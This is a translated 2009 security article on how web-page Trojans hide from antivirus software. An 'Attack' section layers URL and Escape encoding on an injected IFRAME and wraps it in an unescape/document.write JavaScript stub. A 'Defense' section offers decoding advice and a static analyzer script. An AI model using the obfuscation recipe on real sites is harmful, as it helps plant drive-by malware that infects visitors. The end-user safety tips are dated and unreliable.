myhack58 | Anonymous | MYHACK58:62200922494
History: Mar 13, 2009 - 12:00 a.m.

Analysis: how web page Trojans encrypt their code to evade antivirus detection - Vulnerability warning - the black bar safety net

www.myhack58.com

As planting Trojans in web pages (“hanging horses”) has become popular, antivirus software has begun to watch for the various ways of planting them, which annoys many hackers. But hackers soon found a countermeasure: encrypt the code of the Trojan-planting page, scrambling the original code so that antivirus software cannot identify it. Is there really no defense once a web page Trojan has been encrypted? The answer is below.

Swiss Star Tang Wei: a senior security engineer with in-depth research in network security.
Encrypting Trojan-planting web pages is a technique hackers often use to evade detection by antivirus software, so in recent years hackers planting Trojans in web pages have usually taken ready-made page code and encrypted it a second time, or even several times.
Early on, most hackers used only simple Unicode transcoding as encryption, but pages encrypted this way were soon detected by antivirus software and could no longer evade detection. Page encryption tricks therefore began to escalate: from Escape transcoding, to escape-character encryption, and finally to encryption with custom functions.


Security Encyclopedia: Escape is a function present in JavaScript, VBS and other scripting languages. In JavaScript, the Escape function re-encodes certain non-English characters so that they can be passed along in transmission.

Why web Trojans are encrypted

Everyone hates web Trojans, and antivirus software pays close attention to them and takes a variety of preventive measures. This limits how far a web Trojan can spread. To survive longer and avoid being found by antivirus software and other security tools, many hackers encrypt their web page Trojans, which makes antivirus detection harder and raises the Trojan's survival rate. As a result, mainstream web page Trojans are all encrypted.

Web Trojan encryption comes in many types. Most exploit the fact that the various web encoding standards can be converted into one another and encrypt by encoding conversion. In a sense, this scheme only interferes with antivirus identification that relies on signatures to recognize web page Trojans; the code itself is not really encrypted. More advanced encryption tools therefore define their own functions in the scripting language, encrypt strings with them, and add further confusing obstacles for antivirus software so that it cannot tell what it is looking at.

Encrypting by character conversion is like having an address translated into English. Our computer is a translator fluent in many languages: we tell the translator the words, the translator writes them down in English, then applies a simple substitution cipher to that English text, and finally sends the result in Morse code to another translator who can decrypt it.

Since the whole process uses only basic code conversion, anyone who knows English, Morse code and the substitution cipher can unlock it, but to someone who knows no English or cannot read a telegram it is already very confusing. Below, we take Escape encryption, the method hackers currently use most, as an example to outline how web page Trojans are encrypted and how to defend against them.

Security gossip: in the history of cryptography, the most famous substitution cipher device is the cipher machine code-named “Enigma” that the Germans used in World War II. During the war, Enigma provided thorough communication security for the German army's blitzkrieg and the German Navy's “wolf pack” submarine warfare. To decrypt Enigma, the Allies set up a dedicated codebreaking centre in the UK, and in that centre the world's first computer was born. Alan Turing, the father of the computer and the greatest computer scientist of the 20th century, produced many of the prototype theories of the modern computer while cracking Enigma.

Web Trojan encryption/decryption: a hands-on record

Attack

First, prepare the HTML code to be encrypted. Here we choose the following IFRAME code used for planting:

<iframe src=http://soft.yesky.com width=400 height=300></iframe>

Then go to the conversion website http://tool.chinaz.com.

On the page, find “code conversion tools”, then select the “URL16 hexadecimal encryption” item in the drop-down menu. Enter the Trojan page's link address, http://soft.yesky.com, into the address field and click “encryption”; the result is http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ (Figure 1).


Then paste the encrypted URL back into the original IFRAME code:

<iframe src= http://%73%6F%66%74%2E%79%65%73%6B%79%2E%63%6F%6D/ width=400 height=300></iframe>

Then click “Encode encryption/decryption Tool” in the “code conversion tools” menu, copy the IFRAME code into the input box, and click “Encode encryption” to get the encrypted code: %3Ciframe+src%3D+http%3A%2F%2F%2573%256F%2566%2574%252E%2579%2565%2573%256B%2579%252E%2563%256F%256D%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E+ (Figure 2).

Then open WordPad, enter the following code, and paste the encrypted code at the indicated location:

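<SCRIPT LANGUAGE="Javascript"><!--
// Placeholder: the encoded string produced in the previous step goes here.
var Words = "Paste the code generated by the encryption here!";
function OutWord()
{
    var NewWords;
    // unescape() reverses the Escape encoding of the string
    NewWords = unescape(Words);
    // the decoded markup is written into the page
    document.write(NewWords);
}
OutWord();
// -->
</SCRIPT>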



Finally, click “JS way encryption/decryption” in the “transcoding tool” menu, put the completed JavaScript code into the input box, and click “JS encryption” to finish encrypting the code (Figure 3). The encrypted code is then inserted into the web page where the Trojan is to be planted. Afterwards, when a user visits the site, the Trojan is activated.


Defense

When a security engineer comes across an encrypted malicious web page, they likewise go to the conversion site, paste the complicated code into the decryption input box, and click the “decrypt” button to recover the original. Note, however, that because decryption involves converting between different character encodings, you must recognize the characteristics of each encoding during decryption. Escape encoding, for example, usually begins with a “%”; when Chinese is converted to Escape encoding, the result is usually a “%” followed by the lowercase letter “u” and then four hexadecimal characters.
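The manual decoding described above can also be done offline as plain text processing. The following is an added example, not code from the original article: it peels Escape layers (`%XX` and `%uXXXX`) from string literals without executing the page. The function names, the `minTokens` threshold and the sample page (built from the decoder stub and encoded string shown earlier) are assumptions of this example.

```javascript
// Static analysis only: the input is decoded as text, never evaluated or rendered.
const ESCAPE_TOKEN = /%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}/g;

// Decode one layer of Escape encoding (%XX and %uXXXX); other text is left as-is.
function decodeOnce(text) {
  return text.replace(ESCAPE_TOKEN, (tok) =>
    String.fromCharCode(parseInt(tok.slice(tok[1] === "u" ? 2 : 1), 16)));
}

// Peel layers until the text stops changing, with a cap against pathological input.
function peelLayers(text, maxLayers = 8) {
  let layers = 0;
  let current = text;
  while (layers < maxLayers) {
    const next = decodeOnce(current);
    if (next === current) break;
    current = next;
    layers += 1;
  }
  return { layers, decoded: current };
}

// Report the unescape()/document.write() stub and any heavily encoded string literal.
// minTokens is a hypothetical threshold chosen for this example.
function analyze(pageSource, minTokens = 10) {
  const usesStub = /unescape\s*\(/.test(pageSource) &&
    /document\s*\.\s*write\s*\(/.test(pageSource);
  const findings = [];
  for (const m of pageSource.matchAll(/"([^"]*)"/g)) {
    if ((m[1].match(ESCAPE_TOKEN) || []).length < minTokens) continue;
    // The conversion tool's output on this page writes spaces as "+".
    const { layers, decoded } = peelLayers(m[1].replace(/\+/g, " "));
    const src = /<iframe\b[^>]*?\bsrc\s*=\s*["']?\s*([^\s"'>]+)/i.exec(decoded);
    findings.push({ layers, decoded: decoded.trim(), iframeSrc: src ? src[1] : null });
  }
  return { usesStub, findings };
}

// Constructed sample: the page's decoder stub holding the page's encoded string.
const SAMPLE_PAGE = [
  '<SCRIPT LANGUAGE="Javascript"><!--',
  'var Words = "%3Ciframe+src%3D+http%3A%2F%2F%2573%256F%2566%2574%252E%2579%2565%2573%256B%2579%252E%2563%256F%256D%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E+";',
  "function OutWord() { document.write(unescape(Words)); }",
  "OutWord();",
  "// --></SCRIPT>",
].join("\n");

console.log(JSON.stringify(analyze(SAMPLE_PAGE), null, 2));
```

The layer count is a useful signal in itself: the sample needs two passes because the URL was hex-encoded before the whole tag was encoded again.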

For general users, the best way to guard against encrypted malicious web pages is to turn on the antivirus software and its script filtering function, or, in IE's “Internet Options”, on the “Advanced” tab, select “Disable script debugging”. In addition, JS encryption and URL16 hexadecimal encryption are sometimes blocked automatically by the Firefox browser, so when browsing a page you suspect is dangerous, you can choose the Firefox browser.